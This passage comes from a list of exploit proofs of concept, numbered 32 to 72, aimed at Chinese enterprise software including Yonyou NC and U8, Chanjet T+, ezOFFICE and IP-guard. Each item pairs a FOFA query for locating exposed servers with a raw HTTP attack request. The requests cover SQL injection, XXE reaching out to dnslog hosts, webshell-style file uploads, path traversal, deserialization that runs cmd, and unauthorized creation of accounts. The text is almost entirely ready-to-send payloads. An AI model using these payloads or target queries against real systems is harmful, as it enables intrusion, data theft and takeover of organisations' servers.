User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
            }
        }
    }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword endpoint
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo": {
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c ping 6qevyvmi.dnslog.pw"
            }
        }
    }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特脸爱云 all-in-one face-recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the path it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

